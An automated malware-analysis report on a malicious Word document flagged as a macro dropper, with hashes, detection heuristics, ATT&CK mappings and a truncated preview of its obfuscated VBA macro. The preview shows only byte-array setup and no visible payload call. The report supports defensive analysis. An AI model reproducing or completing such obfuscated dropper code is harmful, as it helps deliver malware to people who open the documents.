Office (OLE) malware analysis — malicious · 19dc9b93870ddc3b

MALICIOUS

Office (OLE)

86.0 KB Created: 2018-09-02 19:19:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 9da89a3c06b501fe1dec98009489be4e SHA-1: 57b3ccd57408111ef723181fc75204cf247eaadb SHA-256: 19dc9b93870ddc3beb7fdeea2980c95edc489040e39381d89d0dfe0a825a1570

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6968773-0. High-severity heuristics indicate the presence of VBA macros, a GetObject call, and a CallByName call, all common in malicious documents. The VBA macro code, though truncated, suggests it is designed to download and execute a secondary payload, likely from a URL. The presence of VBA macros points to the T1059.005 (Visual Basic) technique, and the overall nature of malicious documents suggests T1566.001 (Spearphishing Attachment) as the likely initial access vector.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6968773-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6968773-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
GetObject call high OLE_VBA_GETOBJ

GetObject call
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22287 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	22287 bytes
SHA-256: `13eb5f5ed91d32c817262759c9d51e13b873162aa38d5d87a3e5fa1e9f0bd2cf`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Layout, 0, 0, MSForms, Frame" Dim else36, else11(2) As Byte, else94(9) As Byte, else63(32) As Byte, else53(19) As Byte, else47(13) As Byte, else2(5) As Byte, else02(55) As Byte, else39(882) As Byte, else18(5) As Byte Private Sub else82() else18(4) = 5 else18(0) = 218 else18(5) = 211 else18(3) = 255 else18(1) = 211 else18(2) = 1 End Sub Private Sub else03() else63(19) = 59 else63(6) = 231 else63(5) = 219 else63(29) = 25 else63(4) = 22 else63(31) = 197 else63(17) = 252 else63(25) = 152 else63(2) = 10 else63(13) = 80 else63(12) = 103 else63(7) = 20 else63(15) = 146 else63(9) = 120 else63(0) = 238 else63(27) = 69 else63(3) = 243 else63(28) = 79 else63(16) = 241 else63(22) = 82 else63(26) = 100 else63(23) = 115 else63(32) = 170 else63(11) = 77 else63(18) = 46 else63(30) = 176 else63(20) = 29 else63(24) = 139 else63(10) = 252 else63(1) = 200 else63(8) = 201 else63(14) = 171 else63(21) = 252 End Sub Private Sub else72() else94(5) = 223 else94(3) = 233 else94(6) = 253 else94(0) = 202 else94(1) = 201 else94(7) = 3 else94(9) = 125 else94(4) = 38 else94(2) = 11 else94(8) = 156 End Sub Private Sub else16() else39(306) = 135 else39(793) = 18 else39(816) = 190 else39(740) = 212 else39(496) = 192 else39(216) = 86 else39(753) = 246 else39(233) = 109 else39(735) = 155 else39(874) = 154 else39(722) = 174 else39(619) = 74 else39(70) = 18 else39(716) = 211 else39(659) = 129 else39(248) = 181 else39(447) = 103 else39(377) = 152 else39(359) = 121 else39(583) = 14 else39(482) = 118 else39(108) = 167 else39(790) = 157 else39(614) = 166 else39(392) = 24 else39(376) = 110 else39(462) = 47 else39(228) = 248 else39(33) = 134 else39(243) = 191 else39(528) = 155 else39(107) = 177 else39(843) = 189 else39(487) = 111 else39(468) = 224 else39(433) = 4 else39(343) = 221 else39(448) = 250 else39(423) = 163 else39(439) = 227 else39(465) = 254 else39(455) = 149 else39(160) = 249 else39(837) = 254 else39(840) = 163 else39(566) = 109 else39(196) = 89 else39(489) = 74 else39(661) = 159 else39(408) = 150 else39(559) = 25 else39(159) = 76 else39(200) = 69 else39(691) = 249 else39(869) = 70 else39(156) = 229 else39(675) = 32 else39(205) = 92 else39(413) = 195 else39(683) = 253 else39(829) = 76 else39(621) = 20 else39(545) = 4 else39(491) = 158 else39(339) = 46 else39(654) = 227 else39(132) = 219 else39(8) = 176 else39(510) = 138 else39(212) = 40 else39(394) = 220 else39(719) = 250 else39(167) = 97 else39(189) = 146 else39(663) = 83 else39(138) = 176 else39(449) = 66 else39(83) = 240 else39(875) = 203 else39(323) = 60 else39(202) = 65 else39(758) = 155 else39(139) = 250 else39(253) = 29 else39(34) = 173 else39(581) = 58 else39(541) = 4 else39(399) = 20 else39(689) = 147 else39(383) = 208 else39(546) = 175 else39(99) = 143 else39(113) = 64 else39(398) = 120 else39(733) = 18 else39(177) = 37 else39(179) = 204 else39(309) = 221 else39(264) = 133 else39(327) = 20 else39(164) = 226 else39(772) = 30 else39(30) = 240 else39(112) = 151 else39(67) = 242 else39(48) = 186 else39(232) = 196 else39(157) = 136 else39(620) = 30 else39(778) = 114 else39(644) = 146 else39(220) = 219 else39(525) = 141 else39(4) = 94 else39(178) = 94 else39(766) = 221 else39(511) = 129 else39(403) = 141 else39(866) = 176 else39(587) = 31 else39(574) = 211 else39(55) = 36 else39(173) = 35 else39(49) = 241 else39(77) = 7 else39(609) = 199 else39(330) = 177 else39(685) = 234 else39(364) = 215 else39(863) = 232 else39(791) = 143 else39(41) = 220 else39(536) = 61 else39(803) = 90 else39(276) = 216 else39(601) = 184 else39(503) = 91 else39(430) = 104 else39(678) = 36 else39(785) = 117 else39(145) = 247 else ... (truncated)

SHA-256: 13eb5f5ed91d32c817262759c9d51e13b873162aa38d5d87a3e5fa1e9f0bd2cf

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Layout, 0, 0, MSForms, Frame"
Dim else36, else11(2) As Byte, else94(9) As Byte, else63(32) As Byte, else53(19) As Byte, else47(13) As Byte, else2(5) As Byte, else02(55) As Byte, else39(882) As Byte, else18(5) As Byte
Private Sub else82()
else18(4) = 5
else18(0) = 218
else18(5) = 211
else18(3) = 255
else18(1) = 211
else18(2) = 1
End Sub
Private Sub else03()
else63(19) = 59
else63(6) = 231
else63(5) = 219
else63(29) = 25
else63(4) = 22
else63(31) = 197
else63(17) = 252
else63(25) = 152
else63(2) = 10
else63(13) = 80
else63(12) = 103
else63(7) = 20
else63(15) = 146
else63(9) = 120
else63(0) = 238
else63(27) = 69
else63(3) = 243
else63(28) = 79
else63(16) = 241
else63(22) = 82
else63(26) = 100
else63(23) = 115
else63(32) = 170
else63(11) = 77
else63(18) = 46
else63(30) = 176
else63(20) = 29
else63(24) = 139
else63(10) = 252
else63(1) = 200
else63(8) = 201
else63(14) = 171
else63(21) = 252
End Sub
Private Sub else72()
else94(5) = 223
else94(3) = 233
else94(6) = 253
else94(0) = 202
else94(1) = 201
else94(7) = 3
else94(9) = 125
else94(4) = 38
else94(2) = 11
else94(8) = 156
End Sub
Private Sub else16()
else39(306) = 135
else39(793) = 18
else39(816) = 190
else39(740) = 212
else39(496) = 192
else39(216) = 86
else39(753) = 246
else39(233) = 109
else39(735) = 155
else39(874) = 154
else39(722) = 174
else39(619) = 74
else39(70) = 18
else39(716) = 211
else39(659) = 129
else39(248) = 181
else39(447) = 103
else39(377) = 152
else39(359) = 121
else39(583) = 14
else39(482) = 118
else39(108) = 167
else39(790) = 157
else39(614) = 166
else39(392) = 24
else39(376) = 110
else39(462) = 47
else39(228) = 248
else39(33) = 134
else39(243) = 191
else39(528) = 155
else39(107) = 177
else39(843) = 189
else39(487) = 111
else39(468) = 224
else39(433) = 4
else39(343) = 221
else39(448) = 250
else39(423) = 163
else39(439) = 227
else39(465) = 254
else39(455) = 149
else39(160) = 249
else39(837) = 254
else39(840) = 163
else39(566) = 109
else39(196) = 89
else39(489) = 74
else39(661) = 159
else39(408) = 150
else39(559) = 25
else39(159) = 76
else39(200) = 69
else39(691) = 249
else39(869) = 70
else39(156) = 229
else39(675) = 32
else39(205) = 92
else39(413) = 195
else39(683) = 253
else39(829) = 76
else39(621) = 20
else39(545) = 4
else39(491) = 158
else39(339) = 46
else39(654) = 227
else39(132) = 219
else39(8) = 176
else39(510) = 138
else39(212) = 40
else39(394) = 220
else39(719) = 250
else39(167) = 97
else39(189) = 146
else39(663) = 83
else39(138) = 176
else39(449) = 66
else39(83) = 240
else39(875) = 203
else39(323) = 60
else39(202) = 65
else39(758) = 155
else39(139) = 250
else39(253) = 29
else39(34) = 173
else39(581) = 58
else39(541) = 4
else39(399) = 20
else39(689) = 147
else39(383) = 208
else39(546) = 175
else39(99) = 143
else39(113) = 64
else39(398) = 120
else39(733) = 18
else39(177) = 37
else39(179) = 204
else39(309) = 221
else39(264) = 133
else39(327) = 20
else39(164) = 226
else39(772) = 30
else39(30) = 240
else39(112) = 151
else39(67) = 242
else39(48) = 186
else39(232) = 196
else39(157) = 136
else39(620) = 30
else39(778) = 114
else39(644) = 146
else39(220) = 219
else39(525) = 141
else39(4) = 94
else39(178) = 94
else39(766) = 221
else39(511) = 129
else39(403) = 141
else39(866) = 176
else39(587) = 31
else39(574) = 211
else39(55) = 36
else39(173) = 35
else39(49) = 241
else39(77) = 7
else39(609) = 199
else39(330) = 177
else39(685) = 234
else39(364) = 215
else39(863) = 232
else39(791) = 143
else39(41) = 220
else39(536) = 61
else39(803) = 90
else39(276) = 216
else39(601) = 184
else39(503) = 91
else39(430) = 104
else39(678) = 36
else39(785) = 117
else39(145) = 247
else
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.